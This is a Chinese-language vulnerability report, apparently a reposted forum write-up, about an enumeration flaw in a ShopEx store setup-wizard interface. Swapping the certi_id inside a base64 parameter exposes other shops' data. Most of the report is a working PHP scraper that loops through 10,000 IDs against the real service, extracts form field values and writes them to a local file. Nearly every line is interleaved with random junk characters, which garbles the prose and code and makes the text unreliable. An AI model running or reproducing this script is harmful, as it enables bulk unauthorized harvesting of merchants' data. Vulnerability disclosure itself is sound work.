|
简要描述:
- o1 ~9 B1 F ^! J7 e7 N5 O; n6 vShopEx某接口缺陷,可遍历所有网站* V/ p- `, Q, w
详细说明:
! X: y6 f8 t# f' S! I0 b% y. K! e. K问题出现在shopex 网店使用向导页面 B. Y% K8 }) ~3 B1 {, Z8 h
9 r* m# ^8 b8 A! h! `4 H& a) [; q9 i6 p9 |
6 j% s7 i( r) o9 Z' j7 l) Z
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=9 K0 a7 H: i5 l2 y1 M0 r6 E# L
% `7 P$ J* I( p _7 m) E" t L
4 b2 q3 X' ]. X3 ?# n) c5 R0 |& h" f* V
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
/ r; C' T5 q* y, z& C+ v7 K. u: Z5 D0 d R# p, N3 p
7 U# P& G, y, U R; j6 ?
& p2 I# m; t- m3 p
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 3 ^* e0 w& h2 k
, P7 M8 e& L: h2 [
8 q) c% f5 @. F. j+ w0 o p7 p$ L$ ]9 s' d! f S0 I1 F4 z* K( o
<?php
& H' y/ }2 e$ k: f
2 g# x5 s& f6 J6 p- ]! x for ($i=1; $i < 10000; $i++) { //遍历- G" ]5 O- J$ W
; Y6 W# X+ s s1 C; I) \5 B5 m- ~ ShowshopExD($i);
. D+ s' \0 g4 f* {5 I7 { \) D+ I6 v
}# b7 G/ m; y4 D
! n1 ~, f, Z r4 l1 Z3 | function ShowshopExD($cid) {
5 G7 l2 f' j' h0 b8 B( a# L9 _! V$ }! e, p3 Q/ E$ a- l/ ]
$url='http://guide.ecos.shopex.cn/step2.php';. p1 Z4 ~; P$ ?, R/ g [, U
* B0 c; C+ ~" k' E; C $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');5 r7 f7 P, i# _7 Q. d/ O' [/ w- n
, F- b/ Q4 ^' d( M f# { $url = $url.'?refer='.$refer;
( J! o$ I* |0 w. o4 o( x; |8 m9 d% v' `7 B/ ~: ]9 V1 v
$ch = curl_init($url);
* u; t: m" y* V5 H3 k' d! q- Y; U: Q* g: i2 S3 f9 v0 V6 n) ~
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
( r5 d) n+ }2 A/ X& X \9 [! _$ u- ]* N& j& R8 I7 g) i' F
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
* D0 N6 |" q e7 o' L. q/ _) F# v* P: T# i/ F! T4 _8 A, F) Q! v+ e! b6 I
$result = curl_exec($ch);
7 ]( h' M% a; P5 I0 [ e4 Y4 W$ _; E# b R3 f4 S) h
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
) D# @+ [2 N8 R$ @: ^) w6 `* W3 n7 B, |( v! ~4 ]
if(strpos($result,$refer))
) s, S) i+ f G+ d
0 W* h# H q; H' c3 w2 J {
; j/ L7 t( M) H: b8 u K% I: ]& r1 D0 j
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
' L" _- T& G. }4 `+ ^
: ]2 Q6 O4 z6 l( t6 W preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);2 m" n* a5 J8 x. e6 @" w" w
" c( Z3 n, @0 f5 |) U4 V foreach ($value[1] as $key) {: Y4 J$ _4 Y9 @/ E, C1 v
- Y0 q$ Z9 M3 a preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);8 l. V4 T" B* `, a
7 N! u' S; |/ I3 y+ _
echo $res[1][0].':'.$res[3][0]."\r\n";$ g I7 J9 D! y
4 b8 L% x* A) t. e, C $col =$res[1][0].':'.$res[3][0]."\r\n"; ~% l% V. `1 P. A
: f- s* l- `/ c+ i# k* T* P2 Q fwrite($fp, $col, strlen($col));
( l& F# J* H( D1 n m0 S, P2 k. w5 F7 ~( Q. F
}! m8 h1 ?2 M; z+ ?$ R( L' i
% l0 U& Y5 F6 s& h' J
echo '--------------------------------'."\r\n";
5 e# u N- U5 x7 U" M/ R. t# Y3 U( u- V7 y! a; j3 @
fclose($fp); 6 w) f8 y/ g9 p C1 x" ?2 Y
% e7 b9 Z* `3 h3 y8 ~) K
}# v- f- N* D `6 Z' t# R- z* u0 b
7 N/ D+ E- C) B- P/ b8 T flush();
3 K& D' v/ J/ H& A+ y$ A9 V$ J0 R" {: @ t& b
curl_close($ch);/ V2 P T- E5 v0 n7 l, t2 ^
# q6 L/ D2 ?6 u. x) j& O& M9 Z/ T
}# } G d" `9 `9 }: H% E W9 f; r
: x I& b$ J4 U2 o?>
& f* m. ]; p3 t& O1 b漏洞证明:
0 D' O$ y g$ N. _http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
' ?7 n: I7 l3 d6 \! zrefer换成其他加密方式4 |3 T4 h5 a. h! \
|
|